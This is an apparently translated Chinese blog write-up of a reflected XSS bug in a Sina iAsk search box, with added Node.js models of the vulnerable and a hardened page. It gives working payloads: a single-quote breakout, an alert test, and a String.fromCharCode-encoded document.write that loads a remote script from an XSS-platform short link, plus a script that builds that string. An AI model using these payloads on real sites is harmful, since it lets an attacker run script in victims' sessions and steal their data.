A Brief Look at XSS Techniques through a Sina XSS Vulnerability

Category: XSS knowledge. Posted by admin.

As the Internet era races ahead, network security draws ever more attention. SQL injection, which once ran rampant everywhere, has slowly begun to recede with the arrival of anti-injection software, WAFs and CDNs. A non-real-time attack, cross-site scripting (XSS), has gone against the current and risen over the past few years, amply confirming the saying "there is no absolute security".

This article uses an XSS vulnerability on a Sina sub-site to outline some XSS exploitation techniques; I hope readers take something away from it.

XSS attack: it lets a malicious web user plant code, such as HTML and client-side script, into a page that is then served to other users, so the script runs in their browsers under the site's origin. Just as SQL injection has many tricks, so does XSS.

Author: 小鸟

Silic (习科) ID: zhj527641718

I'm rather fond of buying lottery tickets, and one day I happened to notice that Sina Lottery exists, so I went to take a look.

On the page in my screenshot there is a search box. Browsing WooYun I had often seen the big names digging XSS bugs at Sina, Baidu and Tencent; I don't normally hunt bugs, but my gut said there had to be one here, and that is how the XSS techniques summarised below came about.

 

Target: Sina iAsk (新浪爱知识人)

Tools: Chrome and its F12 developer tools (editor's note: I only know how to use IE's F12)

Type a run of a's into the search box; the Chrome F12 tools then show:

The value attribute of the input holds the aaaa I typed, and the attribute value is terminated by a double quote ".

When the input's type is text, value is whatever is in the box: type aaaaa and value is aaaaa. Since the page stores the typed text in value, the first thing to test is whether the double quote " is filtered.

If it is not, we can close the attribute and add an event handler directly, for example:

aaaaa" onclick="javascript:alert('x')"

Unfortunately it was filtered: the server evidently converts the " to something else. So back to the F12 tools and keep looking further down the page.

Press Ctrl+F in the inspector; aaaaa appears in 4 places:

Let's look at where these four spots sit in the page. No screenshots for this, just a description.

The first two are value="aaaaaaaa"; the third is a href="URL+aaaaa"; the key one is the fourth:

<span class="pun">&lt;</span><span class="pln">script</span><span class="pun">&gt;</span>
<span class="kwd">function</span><span class="pln"> thisinit</span><span class="pun">()</span>
<span class="pun">{</span>
<span class="pln"> $</span><span class="pun">(</span><span class="str">"syzs1"</span><span class="pun">).</span><span class="pln">value </span><span class="pun">=</span><span class="lit">50</span><span class="pun">-</span><span class="pln"> document</span><span class="pun">.</span><span class="pln">login</span><span class="pun">.</span><span class="pln">title</span><span class="pun">.</span><span class="pln">value</span><span class="pun">.</span><span class="pln">length</span><span class="pun">;</span>
<span class="pln"> $</span><span class="pun">(</span><span class="str">"syzs2"</span><span class="pun">).</span><span class="pln">value </span><span class="pun">=</span><span class="lit">3000</span><span class="pun">-</span><span class="pln"> document</span><span class="pun">.</span><span class="pln">login</span><span class="pun">.</span><span class="pln">description</span><span class="pun">.</span><span class="pln">value</span><span class="pun">.</span><span class="pln">length</span><span class="pun">;</span>
<span class="pln"> getTitleContent </span><span class="pun">(</span><span class="str">'aaaaaaaa'</span><span class="pun">,</span><span class="str">'0'</span><span class="pun">);</span>
<span class="pln"> getTitleClass</span><span class="pun">(</span><span class="str">'0'</span><span class="pun">);</span>
<span class="pln"> autotenms</span><span class="pun">();</span>
<span class="pun">}</span>
<span class="kwd">if</span><span class="pun">(</span><span class="pln">window</span><span class="pun">.</span><span class="typ">Event</span><span class="pun">)</span><span class="pun">{</span>
<span class="pln"> window</span><span class="pun">.</span><span class="pln">onload </span><span class="pun">=</span><span class="pln"> thisinit</span><span class="pun">();</span>
<span class="pun">}</span><span class="kwd">else</span><span class="pun">{</span>
<span class="pln"> setTimeout</span><span class="pun">(</span><span class="pln">thisinit</span><span class="pun">,</span><span class="lit">100</span><span class="pun">);</span>
<span class="pun">}</span>
<span class="pun">&lt;/</span><span class="pln">script</span><span class="pun">&gt;</span>

Note line 6 of that block: the server passes the client-supplied value into getTitleContent as a string literal wrapped in single quotes.

Double quotes are filtered, so try a single quote. Test string: aaaaaaaa'Aaaaa

A word on why it is written this way: admittedly aaaa is just habit; the single quote in the middle is the real test, and because a single quote is small and hard to make out in the F12 view, the Aaaaa after it makes the outcome more obvious. In the debugger, JS strings are shown in red, code (function names) in black and comments in green, so it is easy to see what happened and hard to misjudge. A small detail, but it helps.

Here it is perfectly clear: Aaaaa is rendered in black, which proves the single quote ' was not filtered. The browser now sees Aaaaa as code immediately following a closed string literal, which is not valid JavaScript, so the script fails with a syntax error.

Knowing that the single quote ' is not filtered, the next test is to execute alert('a') and pop an alert.

The test succeeds: a pops up.

The resulting statement, explained:

getTitleContent('aaaaaaaa'+alert('a')+'Aaaaa','0');

Start with a simple example:

<script>
var a = 'q';
var b = 'd' + a + 'e';
alert(b);
</script>

This pops up dqe. In JS the + operator between strings concatenates them, so the code runs like this:

First a is created and assigned the string "q"; then b is created and assigned the string "d" with the value of a appended and the string "e" appended after that. The alert therefore shows dqe.

With that understood, the meaning of getTitleContent('aaaaaaaa'+alert('a')+'Aaaaa', '0'); should be clear.

aaaaaaaa is a string literal, which we close with our own single quote; + then concatenates the result of the alert call, which runs at that moment; finally +' reopens a literal so that the page's original closing quote still balances, and Aaaaa is just filler after it. The filler can be left out, that is a matter of habit. One caveat: alert returns undefined, so the string that actually reaches getTitleContent is 'aaaaaaaaundefinedAaaaa', but by then the alert has already fired.
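As an added example (not code from the original post or from Sina), here is a Node.js model of the vulnerable page and of a hardened rendering of the same four sinks. The filter (double quotes and angle brackets turned into entities, single quotes untouched), the markup and all helper names (sinaFilter, renderSearchPage, renderSearchPageHardened, runWithStubs) are assumptions reconstructed from the description above; getTitleContent and alert are stubbed so the script body can be executed offline and its calls recorded.

```javascript
// Added example, not code from the original post or from Sina: a Node.js
// model of the search page described above. The filter, the markup and the
// helper names (sinaFilter, renderSearchPage, renderSearchPageHardened,
// runWithStubs) are assumptions reconstructed from the post, not the
// site's real code.

// The filter the author observed: double quotes and angle brackets are
// neutralised (modelled here as HTML entities); single quotes pass through.
function sinaFilter(input) {
  return input.replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// The four sinks found with Ctrl+F: two value attributes, one href, and a
// single-quoted JavaScript string literal inside an inline <script>.
function renderSearchPage(query, filter) {
  const q = filter(query);
  return [
    `<input type="text" name="title" value="${q}">`,
    `<input type="hidden" name="q" value="${q}">`,
    `<a href="/search?q=${q}">${q}</a>`,
    `<script>getTitleContent('${q}','0');</script>`,
  ].join('\n');
}

// Pull out the inline script body: this is what the browser is asked to run.
function inlineScript(html) {
  const m = /<script>([\s\S]*?)<\/script>/.exec(html);
  return m ? m[1] : null;
}

// The probe step: aaaaaaaa'Aaaaa proves the quote is unfiltered precisely
// because the script stops parsing (what the debugger's red/black colouring
// shows). new Function compiles the body without running anything.
function parses(js) {
  try { new Function(js); return true; } catch (e) { return false; }
}

// Run a script body with getTitleContent and alert stubbed, recording the
// calls. The alert stub returns undefined like the real one, which is why
// the title that reaches getTitleContent is 'aaaaaaaaundefinedAaaaa'.
function runWithStubs(js) {
  const log = { titles: [], alerts: [] };
  new Function('getTitleContent', 'alert', js)(
    t => { log.titles.push(t); },
    m => { log.alerts.push(m); }
  );
  return log;
}

// Hardened rendering: the JS sink gets a JSON string literal (quotes and
// backslashes escaped) with < and > as \u escapes so a value containing
// </script> or <!-- cannot end the element; HTML sinks get full entity
// encoding including the single quote; the href gets URL encoding.
function jsStringLiteral(s) {
  return JSON.stringify(s).replace(/</g, '\\u003c').replace(/>/g, '\\u003e');
}
function htmlEscape(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/'/g, '&#39;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}
function renderSearchPageHardened(query) {
  const h = htmlEscape(query);
  return [
    `<input type="text" name="title" value="${h}">`,
    `<input type="hidden" name="q" value="${h}">`,
    `<a href="/search?q=${encodeURIComponent(query)}">${h}</a>`,
    `<script>getTitleContent(${jsStringLiteral(query)},'0');</script>`,
  ].join('\n');
}

// The post's payload against both renderers.
const PAYLOAD = "aaaaaaaa'+alert('a')+'Aaaaa";
console.log(runWithStubs(inlineScript(renderSearchPage(PAYLOAD, sinaFilter))));
console.log(runWithStubs(inlineScript(renderSearchPageHardened(PAYLOAD))));
```

Run it with node: the first log shows alerts ['a'] and a title of 'aaaaaaaaundefinedAaaaa' from the vulnerable sink; the second shows the hardened sink handing the entire payload to getTitleContent as data, with no alert. The defensive point is contextual encoding: the same value lands in an HTML attribute, a URL and a JS string literal, and each context needs its own encoder. Stripping a fixed set of characters at the input only protects the contexts the developer happened to think of, which is exactly what the single-quote gap here shows.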

Since the server does not filter the single quote ', we can go straight to calling JS. Again, start with a test statement:

document.write('<script src='http://silic.org'></script>');

But the result looked like this:

Besides double quotes, the page filters angle brackets too. (The nested single quotes around the src value in that test would also break the enclosing string literal on their own; encoding the whole tag as character codes sidesteps both problems.) So encode the script tag as ASCII codes with String.fromCharCode, which gives:

document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,113,113,46,99,111,109,39,62,60,92,47,115,99,114,105,112,116,62))

(The codes decode to <script src='http://www.qq.com'><\/script>; code 92 is the backslash discussed below.)

Then test again.

And there it is: the remote JS loads successfully.

One thing to flag: I converted this with the XSS converter written by gainover, and found that when the page runs it a backslash \ is added, so the tag ends up as <\/script>. So before using the output, delete the last 92 and then run it. (The reason: in a JavaScript string literal, \/ is simply /, the usual way to stop a </script> inside a string from terminating the enclosing script element; inside String.fromCharCode, however, code 92 becomes a literal backslash in the generated HTML, so the end tag no longer matches.)

Take the shortened URL http://x.co/1KKP5 from the XSS platform, encode it the same way, and enter the result in the search box:

aaaaa'+document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,120,46,99,111,47,49,75,75,80,53,39,62,60,47,115,99,114,105,112,116,62))+'aaa
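As an added example (not code from the original post, from gainover's converter or from any XSS platform), the following Node.js helpers build the String.fromCharCode payload above, decode such an expression without eval so a converter's output can be checked before use, and execute the injected statement against a stubbed document.write to show what would actually be written into the page. The filter model (", < and > rejected) follows the author's observations; the helper names and the stub are assumptions.

```javascript
// Added example, not code from the original post or from any XSS platform:
// builds and checks the String.fromCharCode payload described above. The
// filter model (rejecting ", < and >) follows the author's observations;
// the stubbed document.write and the helper names are assumptions so the
// whole chain can be exercised offline.

// Encode text as a String.fromCharCode(...) expression. The result contains
// only letters, digits, a dot, commas and parentheses, so it survives a
// filter that only strips quotes and angle brackets.
function toFromCharCode(text) {
  return `String.fromCharCode(${Array.from(text, c => c.charCodeAt(0)).join(',')})`;
}

// Decode such an expression without eval, so a payload (or a converter's
// output) can be inspected before it is sent. Whitespace is ignored.
function decodeFromCharCode(expr) {
  const m = /^String\.fromCharCode\(([\d,]*)\)$/.exec(expr.replace(/\s+/g, ''));
  if (!m) throw new Error('not a String.fromCharCode expression');
  return String.fromCharCode(...m[1].split(',').filter(Boolean).map(Number));
}

// True when none of the characters the page neutralised are present.
function survivesFilter(s) {
  return !/["<>]/.test(s);
}

// The complete injection string for the single-quoted sink: close the
// literal, concatenate document.write(...), reopen the literal.
function buildPayload(src) {
  const tag = `<script src='${src}'></script>`;
  return `aaaaa'+document.write(${toFromCharCode(tag)})+'aaa`;
}

// Execute the injected statement as the page would, with document.write
// stubbed, and return the HTML that would have been written into the page.
function writtenHtml(injected) {
  const written = [];
  const doc = { write: s => { written.push(s); } };
  new Function('document', 'getTitleContent', `getTitleContent('${injected}','0');`)(doc, () => {});
  return written.join('');
}

// The converter the author used emitted code 92 (a backslash) before the
// closing tag's slash, i.e. <\/script>. In a JavaScript string literal "\/"
// is just "/", the usual way to keep </script> from ending the enclosing
// <script> element, but String.fromCharCode produces the raw characters, so
// the backslash lands in the HTML and the end tag no longer matches.
// Dropping the 92, as the post says, restores a proper </script>.
const CONVERTER_OUTPUT = 'String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,'
  + '104,116,116,112,58,47,47,119,119,119,46,113,113,46,99,111,109,39,62,60,92,47,115,99,114,105,112,116,62)';
function dropConverterBackslash(expr) {
  return expr.replace(/,92,47,/g, ',47,');
}

console.log(buildPayload('http://x.co/1KKP5'));
console.log(writtenHtml(buildPayload('http://x.co/1KKP5')));
console.log(decodeFromCharCode(dropConverterBackslash(CONVERTER_OUTPUT)));
```

buildPayload('http://x.co/1KKP5') reproduces the search-box string above character for character, and decodeFromCharCode(CONVERTER_OUTPUT) shows the <\/script> the author hit before dropConverterBackslash removes the 92. Note that document.write returns undefined, so the title string that reaches getTitleContent is 'aaaaaundefinedaaa', the same side effect seen with alert earlier; the injected tag has been written by then.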

Finally, the screenshot:

*Author's note: this article is for study and technical research only; it is meant to remind developers to defend comprehensively against XSS, and must not be imitated or used to harm others' interests (for safety and privacy, the editor has removed the details of the stored-XSS part of this post).

//Silic.Org

Source: http://silic.org/post/xss_skills_in_sina_iask_search

Please credit when reposting: jinglingshu's blog » A Brief Look at XSS Techniques through a Sina XSS Vulnerability